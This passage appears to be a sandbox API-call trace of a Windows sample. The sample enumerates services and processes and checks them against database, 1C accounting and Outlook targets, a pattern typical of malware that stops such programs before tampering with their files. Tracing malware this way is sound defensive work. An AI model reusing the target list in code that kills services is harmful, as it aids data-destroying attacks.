lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0060.575] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0060.575] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0060.575] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0060.575] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0060.575] lstrlenW (lpString="EventSystem") returned 11 [0060.575] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0060.575] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0060.575] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0060.576] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0060.576] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0060.576] lstrlenW (lpString="gpsvc") returned 5 [0060.576] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0060.576] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0060.576] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0060.576] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0060.576] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0060.576] lstrlenW (lpString="iphlpsvc") returned 8 [0060.576] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0060.576] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0060.576] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0060.576] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0060.576] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0060.576] lstrlenW (lpString="LanmanServer") returned 12 [0060.576] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0060.576] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0060.576] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0060.576] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0060.576] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0060.576] lstrlenW (lpString="LanmanWorkstation") returned 17 [0060.576] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0060.576] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0060.576] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0060.576] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0060.576] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0060.576] lstrlenW (lpString="lmhosts") returned 7 [0060.576] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0060.576] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0060.576] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0060.576] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0060.576] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0060.576] lstrlenW (lpString="MMCSS") returned 5 [0060.577] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0060.577] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0060.577] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0060.577] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0060.577] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0060.577] lstrlenW (lpString="MpsSvc") returned 6 [0060.577] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0060.577] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0060.577] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0060.577] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0060.577] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0060.577] lstrlenW (lpString="Netman") returned 6 [0060.577] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0060.577] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0060.577] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0060.577] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0060.577] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0060.577] lstrlenW (lpString="netprofm") returned 8 [0060.577] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0060.577] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0060.577] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0060.577] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0060.577] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0060.577] lstrlenW (lpString="NlaSvc") returned 6 [0060.577] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0060.577] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0060.577] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0060.577] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0060.577] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0060.577] lstrlenW (lpString="nsi") returned 3 [0060.577] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0060.577] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0060.577] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0060.578] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0060.578] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0060.578] lstrlenW (lpString="PcaSvc") returned 6 [0060.578] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0060.578] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0060.578] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0060.578] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0060.578] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0060.578] lstrlenW (lpString="PlugPlay") returned 8 [0060.578] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0060.578] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0060.578] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0060.578] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0060.578] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0060.578] lstrlenW (lpString="Power") returned 5 [0060.578] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0060.578] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0060.578] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0060.578] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0060.578] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0060.578] lstrlenW (lpString="ProfSvc") returned 7 [0060.578] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0060.578] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0060.578] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0060.578] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0060.578] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0060.578] lstrlenW (lpString="RpcEptMapper") returned 12 [0060.578] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0060.578] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0060.578] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0060.578] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0060.578] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0060.578] lstrlenW (lpString="RpcSs") returned 5 [0060.578] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0060.579] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0060.579] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0060.579] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0060.579] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0060.579] lstrlenW (lpString="SamSs") returned 5 [0060.579] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0060.579] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0060.579] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0060.579] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0060.579] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0060.579] lstrlenW (lpString="Schedule") returned 8 [0060.579] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0060.579] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0060.579] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0060.579] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0060.579] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0060.579] lstrlenW (lpString="SENS") returned 4 [0060.579] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0060.579] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0060.579] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0060.579] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0060.579] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0060.579] lstrlenW (lpString="ShellHWDetection") returned 16 [0060.579] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0060.579] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0060.579] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0060.579] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0060.579] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0060.579] lstrlenW (lpString="Spooler") returned 7 [0060.579] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0060.579] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0060.579] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0060.579] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0060.580] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0060.580] lstrlenW (lpString="swprv") returned 5 [0060.580] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0060.580] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0060.580] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0060.580] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0060.580] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0060.580] lstrlenW (lpString="SysMain") returned 7 [0060.580] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0060.580] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0060.580] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0060.580] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0060.580] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0060.580] lstrlenW (lpString="Themes") returned 6 [0060.580] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0060.580] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0060.580] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0060.580] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0060.580] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0060.580] lstrlenW (lpString="TrkWks") returned 6 [0060.580] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0060.580] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0060.580] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0060.580] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0060.580] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0060.580] lstrlenW (lpString="UxSms") returned 5 [0060.580] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0060.580] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0060.580] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0060.580] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0060.580] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0060.580] lstrlenW (lpString="VSS") returned 3 [0060.580] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0060.580] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0060.581] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0060.581] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0060.581] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0060.581] lstrlenW (lpString="WdiServiceHost") returned 14 [0060.581] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0060.581] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0060.581] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0060.581] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0060.581] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0060.581] lstrlenW (lpString="WdiSystemHost") returned 13 [0060.581] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0060.581] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0060.581] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0060.581] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0060.581] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0060.581] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0060.581] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0060.581] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0060.581] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0060.581] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0060.581] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0060.581] lstrlenW (lpString="Winmgmt") returned 7 [0060.581] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0060.581] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0060.584] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0060.584] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0060.584] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0060.738] lstrlenW (lpString="WPDBusEnum") returned 10 [0060.740] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0060.740] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0060.741] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0060.742] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0060.743] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0060.744] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x662fe8 | out: hHeap=0x570000) returned 1 [0060.745] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20c [0060.864] Process32FirstW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0060.983] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0060.984] lstrlenW (lpString="System") returned 6 [0060.984] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0060.984] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0060.984] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0060.984] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0060.984] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0060.984] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0060.984] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0060.985] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0060.985] lstrlenW (lpString="smss.exe") returned 8 [0060.986] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0060.986] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0060.986] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0060.986] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0060.986] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0060.986] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0060.986] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0060.986] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0060.987] lstrlenW (lpString="csrss.exe") returned 9 [0060.987] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0060.987] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0060.987] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0060.987] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0060.987] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0060.987] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0060.987] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0060.987] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0060.988] lstrlenW (lpString="wininit.exe") returned 11 [0060.988] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0060.988] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0060.988] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0060.989] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0060.990] lstrlenW (lpString="csrss.exe") returned 9 [0060.990] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0060.991] lstrlenW (lpString="winlogon.exe") returned 12 [0060.991] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0060.991] lstrlenW (lpString="services.exe") returned 12 [0060.991] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0060.992] lstrlenW (lpString="lsass.exe") returned 9 [0060.992] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0060.993] lstrlenW (lpString="lsm.exe") returned 7 [0060.993] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.994] lstrlenW (lpString="svchost.exe") returned 11 [0060.994] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.994] lstrlenW (lpString="svchost.exe") returned 11 [0060.994] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.995] lstrlenW (lpString="svchost.exe") returned 11 [0060.995] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.996] lstrlenW (lpString="svchost.exe") returned 11 [0060.996] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.996] lstrlenW (lpString="svchost.exe") returned 11 [0060.996] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0060.997] lstrlenW (lpString="audiodg.exe") returned 11 [0060.997] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.998] lstrlenW (lpString="svchost.exe") returned 11 [0060.998] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.999] lstrlenW (lpString="svchost.exe") returned 11 [0060.999] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0060.999] lstrlenW (lpString="dwm.exe") returned 7 [0060.999] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0061.000] lstrlenW (lpString="explorer.exe") returned 12 [0061.000] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0061.001] lstrlenW (lpString="spoolsv.exe") returned 11 [0061.001] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0061.001] lstrlenW (lpString="taskhost.exe") returned 12 [0061.001] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 